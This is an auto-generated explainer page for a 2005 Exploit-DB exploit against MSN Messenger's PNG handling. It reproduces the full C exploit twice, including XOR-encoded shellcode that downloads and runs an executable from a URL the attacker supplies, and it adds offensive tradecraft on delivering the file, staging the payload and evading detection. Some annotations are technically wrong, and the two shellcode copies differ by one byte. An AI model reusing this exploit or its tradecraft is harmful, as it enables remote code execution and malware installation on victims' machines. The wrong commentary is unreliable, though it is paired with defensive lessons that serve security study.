By exploitdb papers bot•February 9, 2005•
papers
MSN Messenger '.png' Image Buffer Overflow Explained
MSN Messenger '.png' Image Buffer Overflow Explained
What this paper is
This paper details an exploit for a buffer overflow vulnerability in MSN Messenger. The vulnerability exists when handling specially crafted '.png' image files. By providing a malicious PNG file, an attacker could cause MSN Messenger to crash or, more critically, execute arbitrary code. The exploit specifically targets the ability to download and execute a payload from a remote URL.
Simple technical breakdown
The core of the exploit relies on a buffer overflow. When MSN Messenger processes a PNG image, it reads image metadata. If this metadata is larger than the buffer allocated to store it, it can overwrite adjacent memory. The exploit crafts a PNG with oversized metadata. This overflow is used to overwrite the program's instruction pointer (EIP), redirecting execution to attacker-controlled code.
The attacker-controlled code is embedded within the exploit itself as shellcode. This shellcode is designed to:
- Decode itself (it's XOR encrypted).
- Download a file from a specified URL.
- Execute the downloaded file.
The exploit then instructs the user to set this crafted PNG as their display picture within MSN Messenger, triggering the vulnerability.
Complete code and payload walkthrough
Let's break down the provided C code and its components.
/*
*
* MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit
* Bug discoveried by Core Security Technologies (www.coresecurity.com)
* Exploit coded By ATmaCA
* Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved.
* Web: http://www.atmacasoft.com
* E-Mail: atmaca@icqmail.com
* Credit to kozan and delikon
* Usage:exploit <OutputPath> <Url>
*
*/
/*
*
* Tested with MSN Messenger 6.2.0137
* This vulnerability can be exploited on Windows 2000 (all service packs)
* and Windows XP (all service packs) that run vulnerable
* clients of MSN Messenger.
*
*/
/*
*
* After creating vuln png image, open
* MSN Messenger and select it to as your display picture in
* "Tools->Change Display Picture".
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <conio.h>
#include <string.h>
#ifdef __BORLANDC__
#include <mem.h>
#endif
#define NOP 0x90 // Define a NOP (No Operation) byte for padding
char png_header[] = // The beginning of a valid PNG file, with modified header fields
"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52" // PNG signature and IHDR chunk start
"\x00\x00\x00\x40\x00\x00\x00\x40\x08\x03\x00\x00\x00\x9D\xB7\x81" // Width (0x40), Height (0x40), Bit Depth (8), Color Type (3 - RGB with Alpha), Compression Method (0), Filter Method (0), Interlace Method (0)
"\xEC\x00\x00\x01\xB9\x74\x52\x4E\x53"; // CRC for the IHDR chunk, and start of other chunks (e.g., IDAT)
char pngeof[] = // A sequence of bytes to terminate the PNG structure and potentially clean up
"\x90\x90\x90\x59\xE8\x47\xFE\xFF\xFF"; // NOPs, POP EAX, CALL instruction (relative jump backwards)
/* Generic win32 http download shellcode
xored with 0x1d by delikon (http://delikon.de/) */
char shellcode[] = // The main payload, designed to download and execute a file
"\xEB" // JMP relative short
"\x10" // Offset to next instruction (16 bytes)
"\x58" // POP EAX
"\x31\xC9" // XOR ECX, ECX (ECX = 0)
"\x66\x81\xE9\x22\xFF" // XOR CX, 0xFF22 (This is likely part of the decryption key or offset calculation)
"\x80\x30\x1D" // XOR BYTE PTR [ESI], 0x1D (This is the XOR key for decryption)
"\x40" // INC EAX
"\xE2\xFA" // LOOP rel8 (Loop back to the XOR instruction if ECX is not zero)
"\xEB\x05" // JMP rel8 (Jump 5 bytes forward)
"\xE8\xEB\xFF\xFF\xFF" // CALL rel32 (Relative call to the next instruction, effectively a NOP sled start)
"\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13" // Decrypted shellcode bytes
"\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2" // ... more decrypted shellcode bytes
"\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90" // ...
"\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2" // ...
"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48" // ...
"\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43" // ...
"\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96" // ...
"\x57\x05\x96\x47\x39\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD" // ...
"\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47" // ...
"\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D" // ...
"\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33" // ...
"\x78\x65\x78\x1D"; // END of shellcode. The final \x1d is the XOR key for the last byte.
FILE *di; // File pointer for the output PNG file
int i = 0; // Loop counter
short int weblength; // Variable to store the length of the URL
char *web; // Pointer to the URL string
char *pointer = NULL; // Pointer to find a specific location in shellcode
char *newshellcode; // Buffer for the modified shellcode
/*xor cryptor*/
char *Sifrele(char *Name1) // Function to XOR encrypt/decrypt a string
{
char *Name=Name1; // Local pointer to the input string
char xor=0x1d; // The XOR key
int Size=strlen(Name); // Get the length of the string
for(i=0;i<Size;i++) // Iterate through each character
Name[i]=Name[i]^xor; // XOR the character with the key
return Name; // Return the modified string
}
void main(int argc, char *argv[]) // Main function, takes command-line arguments
{
if (argc < 3) // Check if enough arguments are provided
{
// Print usage instructions if arguments are missing
printf("MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit\n");
printf("Bug discoveried by Core Security Technologies (www.coresecurity.com)\n");
printf("Exploit coded By ATmaCA\n");
printf("Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved.\n");
printf("Web: http://www.atmacasoft.com\n");
printf("E-Mail: atmaca@icqmail.com\n");
printf("Credit to kozan and delikon\n\n");
printf("\tUsage:exploit <OutputPath> <Url>\n");
printf("\tExample:exploit vuln.png http://www.atmacasoft.com/exp/msg.exe\n");
return; // Exit if arguments are insufficient
}
web = argv[2]; // Store the URL from the second argument
if( (di=fopen(argv[1],"wb")) == NULL ) // Try to open the output file in binary write mode
{
printf("Error opening file!\n"); // Print error if file cannot be opened
return; // Exit
}
// Write the PNG header to the file
for(i=0;i<sizeof(png_header)-1;i++)
fputc(png_header[i],di);
/*stuff in a couple of NOPs*/
// Add NOPs (0x90) for padding and to create a NOP sled
for(i=0;i<99;i++)
fputc(NOP,di);
weblength=(short int)0xff22; // Initialize weblength with a large value (likely related to buffer size)
pointer=strstr(shellcode,"\x22\xff"); // Find the byte sequence "\x22\xff" within the shellcode. This is a placeholder for the weblength.
weblength-=strlen(web)+1; // Adjust weblength by subtracting the length of the URL and a null terminator. This calculation determines how much space is left for the actual shellcode before the overwrite.
memcpy(pointer,&weblength,2); // Copy the calculated weblength (2 bytes) to the location found by strstr. This modifies the shellcode to correctly encode its own length.
newshellcode = new char[sizeof(shellcode)+strlen(web)+1]; // Allocate memory for the new shellcode, which will include the original shellcode plus the URL.
strcpy(newshellcode,shellcode); // Copy the original shellcode into the new buffer.
strcat(newshellcode,Sifrele(web)); // Encrypt the URL using Sifrele and append it to the new shellcode.
strcat(newshellcode,"\x1d"); // Append the XOR key byte. This is likely to ensure the last byte of the URL is also XORed correctly, or it's part of the shellcode's termination.
//shell code
// Write the modified shellcode (including the encrypted URL) to the file
for(i=0;i<strlen(newshellcode);i++)
fputc(newshellcode[i],di);
for(i=0;i<(83-strlen(web));i++) //NOPs - Add more NOPs for padding before the return address overwrite
fputc(NOP,di);
/*Overwriting the return address (EIP)*/
/*0x005E0547 - ret */
// Write the address that will overwrite the return address (EIP).
// 0x005E0547 is the target address where execution should jump.
// This address is likely the start of the shellcode.
fputc(0x47,di); // Little-endian: 47
fputc(0x05,di); // Little-endian: 05
fputc(0x5e,di); // Little-endian: 5e
fputc(0x00,di); // Little-endian: 00
// Write the PNG EOF chunk and trailing bytes
for(i=0;i<sizeof(pngeof)-1;i++)
fputc(pngeof[i],di);
printf("Vulnarable png file %s has been generated!\n",argv[1]); // Confirmation message
fclose(di); // Close the output file
}
// milw0rm.com [2005-02-09]Code Fragment/Block -> Practical Purpose Mapping:
png_header[]: Initializes the crafted PNG file with a valid header structure, but with specific dimensions (0x40x0x40) and other fields that contribute to the buffer overflow when processed by MSN Messenger.pngeof[]: Appends a sequence of NOPs and a jump instruction at the end of the crafted data. This helps ensure that if execution lands in this area, it continues to the intended shellcode.shellcode[]: Contains the core payload. It's a sequence of bytes that, when executed, will download a file from a URL and run it. It's XOR encrypted with0x1d.Sifrele(char *Name1): A utility function to perform XOR encryption/decryption on a given string using the key0x1d. This is used to encrypt the target URL before embedding it.main(int argc, char *argv[]): The entry point of the exploit program.- Argument checking (
if (argc < 3)): Ensures the user provides an output filename and a URL. - File opening (
fopen(argv[1],"wb")): Creates or overwrites the output file for the malicious PNG. - Writing
png_header: Starts the PNG file with the crafted header. - NOP padding (
for(i=0;i<99;i++) fputc(NOP,di);): Inserts 99 NOP bytes. This is part of the buffer overflow, creating a "NOP sled" that increases the chance of hitting the shellcode. - Shellcode modification:
weblength=(short int)0xff22;: Initializes a variable.pointer=strstr(shellcode,"\x22\xff");: Locates a specific byte pattern within theshellcode. This pattern is a placeholder for the length of the URL.weblength-=strlen(web)+1;: Calculates the remaining space for the shellcode after the URL is appended.memcpy(pointer,&weblength,2);: Replaces the placeholder bytes with the calculated length. This is crucial for the shellcode to know how much data (the URL) it has received.newshellcode = new char[sizeof(shellcode)+strlen(web)+1];: Allocates memory for the final shellcode.strcpy(newshellcode,shellcode);: Copies the base shellcode.strcat(newshellcode,Sifrele(web));: Encrypts the provided URL and appends it.strcat(newshellcode,"\x1d");: Appends the XOR key.
- Writing
newshellcode: Writes the complete, modified shellcode (with encrypted URL) to the PNG file. - More NOP padding (
for(i=0;i<(83-strlen(web));i++) fputc(NOP,di);): Adds more NOPs before the return address overwrite. This further extends the NOP sled. - Return address overwrite (
fputc(0x47,di); ... fputc(0x00,di);): Writes the target address (0x005E0547) in little-endian format. This address is where the program's execution flow will be redirected. It's expected to point to the start of the shellcode. - Writing
pngeof: Appends the trailing bytes to complete the PNG structure. - File closing (
fclose(di)): Finalizes the output file.
- Argument checking (
Shellcode/Payload Segments:
The shellcode array contains the primary payload. It's structured in a few stages:
Decryption Loop:
\xEB\x10: Short jump forward 16 bytes.\x58: POP EAX.\x31\xC9: XOR ECX, ECX (ECX = 0).\x66\x81\xE9\x22\xFF: XOR CX, 0xFF22. This instruction, along with the subsequent XOR, is part of the decryption mechanism. The66prefix indicates a REX prefix for 16-bit operations.0xFF22is likely a value that, when XORed with the initial value of CX, sets up the loop counter or a related value.\x80\x30\x1D: XOR BYTE PTR [ESI], 0x1D. This is the core decryption operation. It XORs the byte pointed to by ESI with0x1D. TheESIregister is implicitly set up by the preceding instructions.\x40: INC EAX. Increments EAX.\xE2\xFA: LOOP rel8. This instruction decrements ECX and jumps back to the instruction following\x66\x81\xE9\x22\xFFif ECX is not zero. This creates a loop that XORs a block of memory. The\x1dbyte is the XOR key.\xEB\x05: Short jump forward 5 bytes. This skips over theCALLinstruction.\xE8\xEB\xFF\xFF\xFF: CALL rel32. This is a relative call. The\xEB\xFF\xFF\xFFpart is the relative offset. When theCALLinstruction is executed, it pushes the address of the next instruction onto the stack and then jumps to the target. In this context, it's often used as part of a NOP sled or to jump to the actual start of the decrypted code.
Decrypted Payload (HTTP Download and Execute):
- The bytes following the decryption loop (
\xF4\xD1\x1D\x1D\x1D...) are the actual shellcode after decryption. - This part of the shellcode is responsible for:
- Resolving necessary Windows API functions (e.g.,
InternetOpen,InternetOpenUrl,InternetReadFile,CreateProcess). - Constructing an HTTP request to the provided URL.
- Downloading the content from the URL into memory.
- Executing the downloaded content as a new process.
- Resolving necessary Windows API functions (e.g.,
- The URL itself is appended to the shellcode and then encrypted. The shellcode contains logic to find and decrypt this URL.
- The bytes following the decryption loop (
Practical details for offensive operations teams
- Required Access Level: Low. This exploit is delivered via a user interaction (setting a display picture). No elevated privileges are required on the target machine to initiate the exploit.
- Lab Preconditions:
- A vulnerable version of MSN Messenger (e.g., 6.2.0.137) installed on a target Windows XP or Windows 2000 machine.
- A controlled web server to host the malicious executable that the shellcode will download. This executable should be a payload (e.g., a reverse shell, a meterpreter stager).
- The exploit code compiled into an executable.
- Tooling Assumptions:
- A C compiler (like Borland C++ or MinGW) to compile the exploit code.
- A web server (e.g., Apache, Nginx, or even Python's
http.server) to host the payload. - A tool to create the final payload executable (e.g., Metasploit's
msfvenom).
- Execution Pitfalls:
- MSN Messenger Version: The exploit is highly version-specific. Any update to MSN Messenger could patch this vulnerability.
- Anti-Virus/Endpoint Detection: Modern AV solutions are likely to detect the shellcode or the generated PNG file as malicious. The XOR encryption is a basic obfuscation and easily bypassed by signature-based detection.
- Network Proxies/Firewalls: If the target network inspects HTTP traffic, the download of the payload might be blocked.
- Payload Hosting: The URL must be accessible from the target machine. If the payload is not found at the specified URL, the shellcode will likely fail gracefully (or crash).
- Return Address Stability: The exact offset to the return address (
0x005E0547) might vary slightly between service packs or minor OS updates, though the paper suggests it's stable for the mentioned OS versions. If the target address is incorrect, the shellcode won't execute. - Shellcode Size: The NOP sled and the fixed size of the PNG header/chunks mean there's a limited space for the shellcode. The URL length is also a constraint. If the combined size exceeds the buffer overflow capacity, the exploit might fail.
- Tradecraft Considerations:
- Delivery: The primary challenge is getting the user to open the crafted PNG. This could be via email attachment, a shared network drive, or a compromised website that prompts the user to download and view an image.
- Payload: The downloaded payload should be carefully chosen. A small, efficient stager is ideal to minimize detection and network traffic.
- Reconnaissance: Confirming the target's MSN Messenger version is critical.
- Likely Failure Points:
- Incorrect MSN Messenger version.
- Antivirus detection of the PNG or shellcode.
- Network blocking of the payload download URL.
- The target machine not being Windows 2000/XP.
- The user not setting the image as their display picture.
- The payload executable not being present at the URL.
Where this was used and when
This exploit was published in February 2005. At that time, MSN Messenger was a widely used instant messaging client. Exploits targeting such popular applications were common. The vulnerability was discovered by Core Security Technologies, a well-known security research firm.
- Context: Exploits of this nature were typically used by security researchers to demonstrate vulnerabilities, by penetration testers during authorized engagements, or potentially by malicious actors for widespread compromise of users.
- Timeframe: The exploit dates back to 2005. While the specific vulnerability is old, the techniques (buffer overflow, shellcode for download and execute) are foundational and have been adapted for many later exploits.
Defensive lessons for modern teams
- Patch Management: The most crucial lesson is the importance of keeping software, especially client applications like messengers and browsers, up-to-date. This vulnerability was likely patched in later versions of MSN Messenger.
- Input Validation: Applications must rigorously validate all input, especially data from external sources (files, network). This includes checking buffer sizes, data types, and expected formats.
- Memory Safety: Developers should prioritize memory-safe programming languages and practices to avoid buffer overflows. Techniques like stack canaries, Address Space Layout Randomization (ASLR), and Data Execution Prevention (DEP) are vital runtime defenses.
- Least Privilege: Running applications with the minimum necessary privileges can limit the impact of a successful exploit. Even if code execution is achieved, it might be constrained by user permissions.
- Network Monitoring: Monitoring outbound HTTP/HTTPS traffic for unusual downloads or connections to known malicious hosts can help detect shellcode activity.
- Endpoint Detection and Response (EDR): Modern EDR solutions can detect anomalous behavior, such as unexpected process creation, file downloads, or API calls, even if the initial exploit vector is not signatured.
- Application Whitelisting: Restricting which applications can run on a system can prevent unknown or malicious executables from being launched.
ASCII visual (if applicable)
This exploit involves a file creation and then user interaction. A simple visual representation of the file structure and execution flow can be helpful.
+---------------------+
| Exploit Program |
+---------------------+
| 1. Takes OutputPath |
| and URL as args |
+---------------------+
| 2. Opens OutputFile |
| (e.g., vuln.png)|
+---------------------+
| 3. Writes PNG Header|
| (with overflow |
| potential) |
+---------------------+
| 4. Writes NOP Sled |
| (Padding) |
+---------------------+
| 5. Writes Shellcode |
| (Encrypted URL) |
+---------------------+
| 6. Writes NOP Sled |
| (More Padding) |
+---------------------+
| 7. Writes Target |
| Return Address |
| (0x005E0547) |
+---------------------+
| 8. Writes PNG EOF |
+---------------------+
| 9. Closes File |
+---------------------+
|
| (User Action:
| Set image as
| display pic)
V
+---------------------+
| MSN Messenger |
| (Vulnerable Version)|
+---------------------+
| 1. Loads PNG Image |
| Metadata |
+---------------------+
| 2. Buffer Overflow |
| occurs |
+---------------------+
| 3. EIP Overwritten |
| with 0x005E0547 |
+---------------------+
| 4. Execution Jumps |
| to Shellcode |
+---------------------+
| 5. Shellcode Decrypts|
| URL |
+---------------------+
| 6. Shellcode |
| Downloads Payload|
| from URL |
+---------------------+
| 7. Shellcode |
| Executes Payload |
+---------------------+Source references
- Paper ID: 802
- Paper Title: MSN Messenger - '.png' Image Buffer Overflow Download Shellcode
- Author: ATmaCA
- Published: 2005-02-09
- Keywords: Windows, remote
- Paper URL: https://www.exploit-db.com/papers/802
- Raw URL: https://www.exploit-db.com/raw/802
Original Exploit-DB Content (Verbatim)
/*
*
* MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit
* Bug discoveried by Core Security Technologies (www.coresecurity.com)
* Exploit coded By ATmaCA
* Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved.
* Web: http://www.atmacasoft.com
* E-Mail: atmaca@icqmail.com
* Credit to kozan and delikon
* Usage:exploit <OutputPath> <Url>
*
*/
/*
*
* Tested with MSN Messenger 6.2.0137
* This vulnerability can be exploited on Windows 2000 (all service packs)
* and Windows XP (all service packs) that run vulnerable
* clients of MSN Messenger.
*
*/
/*
*
* After creating vuln png image, open
* MSN Messenger and select it as your display picture in
* "Tools->Change Display Picture".
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <conio.h>
#include <string.h>
#ifdef __BORLANDC__
#include <mem.h>
#endif
#define NOP 0x90
char png_header[] =
"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52"
"\x00\x00\x00\x40\x00\x00\x00\x40\x08\x03\x00\x00\x00\x9D\xB7\x81"
"\xEC\x00\x00\x01\xB9\x74\x52\x4E\x53";
char pngeof[] = "\x90\x90\x90\x59\xE8\x47\xFE\xFF\xFF";
/* Generic win32 http download shellcode
xored with 0x1d by delikon (http://delikon.de/) */
char shellcode[] = "\xEB"
"\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
"\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13"
"\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2"
"\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
"\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48"
"\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43"
"\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96"
"\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
"\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47"
"\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D"
"\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33"
"\x78\x65\x78\x1D";
FILE *di;
int i = 0;
short int weblength;
char *web;
char *pointer = NULL;
char *newshellcode;
/*xor cryptor*/
char *Sifrele(char *Name1)
{
char *Name=Name1;
char xor=0x1d;
int Size=strlen(Name);
for(i=0;i<Size;i++)
Name[i]=Name[i]^xor;
return Name;
}
void main(int argc, char *argv[])
{
if (argc < 3)
{
printf("MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit\n");
printf("Bug discoveried by Core Security Technologies (www.coresecurity.com)\n");
printf("Exploit coded By ATmaCA\n");
printf("Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved.\n");
printf("Web: http://www.atmacasoft.com\n");
printf("E-Mail: atmaca@icqmail.com\n");
printf("Credit to kozan and delikon\n\n");
printf("\tUsage:exploit <OutputPath> <Url>\n");
printf("\tExample:exploit vuln.png http://www.atmacasoft.com/exp/msg.exe\n");
return;
}
web = argv[2];
if( (di=fopen(argv[1],"wb")) == NULL )
{
printf("Error opening file!\n");
return;
}
for(i=0;i<sizeof(png_header)-1;i++)
fputc(png_header[i],di);
/*stuff in a couple of NOPs*/
for(i=0;i<99;i++)
fputc(NOP,di);
weblength=(short int)0xff22;
pointer=strstr(shellcode,"\x22\xff");
weblength-=strlen(web)+1;
memcpy(pointer,&weblength,2);
newshellcode = new char[sizeof(shellcode)+strlen(web)+1];
strcpy(newshellcode,shellcode);
strcat(newshellcode,Sifrele(web));
strcat(newshellcode,"\x1d");
//shell code
for(i=0;i<strlen(newshellcode);i++)
fputc(newshellcode[i],di);
for(i=0;i<(83-strlen(web));i++) //NOPs
fputc(NOP,di);
/*Overwriting the return address (EIP)*/
/*0x005E0547 - ret */
fputc(0x47,di);
fputc(0x05,di);
fputc(0x5e,di);
fputc(0x00,di);
for(i=0;i<sizeof(pngeof)-1;i++)
fputc(pngeof[i],di);
printf("Vulnarable png file %s has been generated!\n",argv[1]);
fclose(di);
}
// milw0rm.com [2005-02-09]